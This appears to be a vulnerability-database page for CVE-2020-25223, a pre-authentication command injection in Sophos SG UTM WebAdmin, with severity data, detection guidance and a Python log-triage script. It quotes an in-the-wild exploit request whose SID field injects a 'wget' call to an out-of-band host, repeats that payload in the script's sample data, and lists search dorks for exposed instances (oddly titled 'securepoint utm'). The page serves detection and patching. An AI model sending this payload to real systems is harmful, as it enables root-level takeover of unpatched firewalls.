CVE-2020-25223
Published 2020-09-25

CVE-2020-25223: A remote code execution vulnerability exists in the WebAdmin of Sophos SG UTM before v9.705 MR5, v9.607 MR7, and v9.511 MR11

Priority: P194 · critical · 9.8 (CVSS 3.1)
CVSS vector: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Tags: KEV · ITW · Exploit · Initial access
CISA Known Exploited Vulnerability, remediation due 2022-04-15
Exploited in the wild
EPSS: 96.69% (99.9th percentile)
Affected
6 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| sophos | unified_threat_management | < 9.511 | 9.511 |
| sophos | unified_threat_management | — | — |
| sophos | unified_threat_management | — | — |
| sophos | unified_threat_management | — | — |
| sophos | unified_threat_management | >= 9.600 < 9.607 | 9.607 |
| sophos | unified_threat_management | >= 9.700 < 9.705 | 9.705 |
Detection & IOCs (extracted from sources)

- Other (request body observed in exploitation, as quoted by a source): `{"objs": [{"FID": "init"}], "SID": "|wget http://{{interactsh-url}}|", "browser": "gecko_linux", "backend_version": -1, "loc": "", "_cookie": null, "wdebug": 0, "RID": "1629210675639_0.5000855117488202", "current_uuid": "", "ipv6": true}`
- Monitor for unauthenticated POST requests to the /var endpoint on the Sophos UTM WebAdmin interface, particularly with a JSON body containing a 'SID' field with shell metacharacters (e.g., pipe characters '|') indicating command injection attempts.
- Detect JSON payloads where the 'SID' field contains pipe-delimited OS commands rather than a legitimate session identifier, as this is the injection vector for CVE-2020-25223.
- Look for the 'FID': 'init' field in POST request bodies to /var as part of the exploit trigger sequence.
- Use Shodan/FOFA/Google dorks to identify exposed Sophos UTM WebAdmin instances: Shodan query 'http.title:"securepoint utm"', FOFA 'title="securepoint utm"', Google 'intitle:"securepoint utm"'.
- The exploit is pre-authentication (no valid session required); alert on any unauthenticated JSON POST to /var with Content-Type: application/json from external IPs.
- Confirm exploitation via out-of-band HTTP interaction (OAST): watch for unexpected outbound HTTP/DNS requests from the UTM host following a suspicious POST to /var.
- Vulnerability affects only Sophos SG UTM versions before v9.705 MR5, v9.607 MR7, and v9.511 MR11; patched versions are not affected.
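The detection guidance above can be turned into a small triage script that runs over request records logged by a reverse proxy or WAF in front of WebAdmin. The following is an added example written for this page; it is not code from Sophos, the Nuclei template, or any other source quoted here. It assumes each request has already been extracted into a dict with `method`, `path`, `content_type`, `cookie` and `body` keys (that record shape is an assumption), and it checks the three indicators listed above: an unauthenticated JSON POST to `/var`, a `SID` value carrying shell metacharacters instead of a session identifier, and the `FID: init` trigger. The exploit-shaped sample body reproduces the IOC quoted above; the other sample records are constructed.

```python
from __future__ import annotations

import json
import re
from typing import Any

# Characters that should never appear in a legitimate WebAdmin session
# identifier but do appear in command-injection payloads (the quoted IOC uses '|').
SHELL_META = re.compile(r"[|;&`$(){}<>\\\n]")

# Constructed sample request records (not real traffic). Record 2 reuses the
# request body quoted in the IOC list above; the rest are made up for the demo.
SAMPLE_REQUESTS: list[dict[str, Any]] = [
    {"method": "GET", "path": "/", "content_type": "", "cookie": "", "body": ""},
    {"method": "POST", "path": "/var", "content_type": "application/x-www-form-urlencoded",
     "cookie": "", "body": "a=1&b=2"},
    {"method": "POST", "path": "/var", "content_type": "application/json", "cookie": "",
     "body": '{"objs": [{"FID": "init"}], "SID": "|wget http://{{interactsh-url}}|", '
             '"browser": "gecko_linux", "backend_version": -1, "loc": "", "_cookie": null, '
             '"wdebug": 0, "RID": "1629210675639_0.5000855117488202", "current_uuid": "", "ipv6": true}'},
    # Constructed benign-looking request: session cookie present, SID is a plain token.
    {"method": "POST", "path": "/var?x=1", "content_type": "application/json; charset=utf-8",
     "cookie": "SID=0a1b2c3d4e5f6a7b8c9d0e1f2a3b4c5d",
     "body": '{"objs": [{"FID": "init"}], "SID": "0a1b2c3d4e5f6a7b8c9d0e1f2a3b4c5d", "RID": "1"}'},
]


def parse_body(raw: str) -> dict[str, Any] | None:
    """Return the JSON object in a request body, or None if it is not a JSON object."""
    try:
        obj = json.loads(raw)
    except (json.JSONDecodeError, TypeError):
        return None
    return obj if isinstance(obj, dict) else None


def findings_for(req: dict[str, Any]) -> list[str]:
    """Apply the page's detection indicators to one request record."""
    out: list[str] = []
    path = str(req.get("path", "")).split("?", 1)[0]
    if req.get("method") != "POST" or path != "/var":
        return out
    ctype = str(req.get("content_type", "")).lower()
    body = parse_body(req.get("body", ""))
    if body is None or not ctype.startswith("application/json"):
        return out
    # The vulnerability is pre-auth: a JSON POST to /var with no session cookie is itself notable.
    if not req.get("cookie"):
        out.append("unauth_json_post_to_var")
    # Injection vector: SID carrying shell metacharacters rather than a session identifier.
    sid = body.get("SID")
    if isinstance(sid, str) and SHELL_META.search(sid):
        out.append("sid_shell_metachar")
    # Trigger sequence: an objs entry with FID "init".
    objs = body.get("objs")
    if isinstance(objs, list) and any(isinstance(o, dict) and o.get("FID") == "init" for o in objs):
        out.append("fid_init_trigger")
    return out


def scan(requests: list[dict[str, Any]]) -> list[tuple[int, list[str]]]:
    """Return (index, findings) for requests worth alerting on.

    FID "init" alone is normal WebAdmin traffic, so a record is reported only if the
    SID looks like an injection or the request is an unauthenticated JSON POST to /var.
    """
    hits: list[tuple[int, list[str]]] = []
    for i, req in enumerate(requests):
        f = findings_for(req)
        if "sid_shell_metachar" in f or "unauth_json_post_to_var" in f:
            hits.append((i, f))
    return hits


if __name__ == "__main__":
    for idx, f in scan(SAMPLE_REQUESTS):
        print(f"request #{idx}: {', '.join(f)}")
```

Any hit carrying `sid_shell_metachar` is the strongest signal and should be followed by the out-of-band check described above (unexpected outbound HTTP/DNS from the UTM host shortly after the request); the `unauth_json_post_to_var` indicator on its own is noisier and is better used to prioritise review than to page someone.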
CVSS provenance

| Source | Version | Score | Severity | Vector |
|---|---|---|---|---|
| nvd | v3.1 | 9.8 | CRITICAL | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H |
| nvd | v2.0 | 10.0 | CRITICAL | AV:N/AC:L/Au:N/C:C/I:C/A:C |
| vulncheck | — | 9.8 | CRITICAL | — |
| cisa | — | 9.8 | CRITICAL | — |
GHSA
GHSA-pwxx-2hrw-72w5: A remote code execution vulnerability exists in the WebAdmin of Sophos SG UTM before v9
ghsa_unreviewed · 2022-05-24 · CVE-2020-25223 [CRITICAL] · CWE-78
A remote code execution vulnerability exists in the WebAdmin of Sophos SG UTM before v9.705 MR5, v9.607 MR7, and v9.511 MR11
VulnCheck
Sophos SG UTM Remote Code Execution Vulnerability
vulncheck · 2020 · CVSS 9.8 · CVE-2020-25223 [CRITICAL] · CWE-78
A remote code execution vulnerability exists in the WebAdmin of Sophos SG UTM.
Affected: Sophos SG UTM
Required Action: Apply updates per vendor instructions.
Exploitation References:
- https://www.cisa.gov/sites/default/files/feeds/known_exploited_vulnerabilities.json
- https://fortiguard.fortinet.com/threat-signal-report/4926/new-zerobot-variant-exploits-additional-vulnerabilities-for-propagation
- https://api.vulncheck.com/v3/index/vulncheck-canaries?cve=CVE-2020-25223&date=2025-10-17
- https://api.vulncheck.com/v3/index/vulncheck-canaries?cve=CVE-2020-25223&date=2025-10-18
- https://api.vulncheck.com/v3/index/vulncheck-canaries?cve=CVE-2020-25223&date=2025-10-19
- https://api.vulncheck.com/v3/index/vulncheck-canaries?cve=CVE-2020-25223&dat
CISA
Sophos SG UTM Remote Code Execution Vulnerability
cisa · 2022-03-25 · CVSS 9.8 · CVE-2020-25223 [CRITICAL] · CWE-78
Vulnerability: Sophos SG UTM Remote Code Execution Vulnerability
Affected: Sophos SG UTM
A remote code execution vulnerability exists in the WebAdmin of Sophos SG UTM.
Required Action: Apply updates per vendor instructions.
Notes: https://nvd.nist.gov/vuln/detail/CVE-2020-25223
Remediation Due Date: 2022-04-15
No detection rules found.
Metasploit
Sophos UTM WebAdmin SID Command Injection
metasploit
This module exploits an SID-based command injection in Sophos UTM's WebAdmin interface to execute shell commands as the root user.
Nuclei
Sophos UTM Preauth - Remote Code Execution
nuclei · CVSS 9.8 · CVE-2020-25223 [CRITICAL]
Sophos SG UTM WebAdmin is susceptible to a remote code execution vulnerability in versions before v9.705 MR5, v9.607 MR7, and v9.511 MR11.
Template:

```yaml
id: CVE-2020-25223

info:
  name: Sophos UTM Preauth - Remote Code Execution
  author: gy741
  severity: critical
  description: Sophos SG UTM WebAdmin is susceptible to a remote code execution vulnerability in versions before v9.705 MR5, v9.607 MR7, and v9.511 MR11.
  impact: |
    Successful exploitation of this vulnerability could lead to remote code execution, allowing attackers to take control of the affected system.
  remediation: |
    Apply the latest security patches provided by Sophos to mitigate the vulnerability.
  reference:
    - https://www.atredis.com/blog/2021/8/18/sophos-utm-cve-2020-25223
    - https://comm
```
Unit42
Attackers Are Taking Advantage of the Open-Source Service Interactsh for Malicious Purposes
blogs_unit42 · Published: October 14, 2021 · Yue Guan, Jin Chen, Leo Olson, Wayne Xin, Daiping Liu
Tags: Threat Research · Cybercrime · Attack analysis · Exploit · Exploit in the wild · Interactsh

## Executive Summary
Recently, Unit 42 has observed active exploits related to an open-source service called Interactsh. This tool can generate specific domain names to help its users test whether an exploit is successful. It can be used by researchers – but also by attackers – to validate vulnerabilities via real-time monitoring on the trace path for the domain. Researchers creating a proof of concept (PoC) for an exploit can insert Interactsh to check whether the PoC is working, but the service could also be used by attackers who want to be sure an exploit is working.
This blog will first introduce the Interactsh tool and how researchers or attackers can leverage it to perform vulnerability validation. We then describe some of the many exploits in the wild leveraging this tool, and we
References
- http://packetstormsecurity.com/files/164697/Sophos-UTM-WebAdmin-SID-Command-Injection.html
- https://community.sophos.com/b/security-blog
- https://community.sophos.com/b/security-blog/posts/advisory-resolved-rce-in-sg-utm-webadmin-cve-2020-25223
- https://cwe.mitre.org/data/definitions/78.html
- https://www.secpod.com/blog/remote-code-execution-in-sophos-utm/
- https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2020-25223

Timeline
- 2020-09-25: Published
- 2022-03-25: Added to CISA KEV
- Exploited in the wild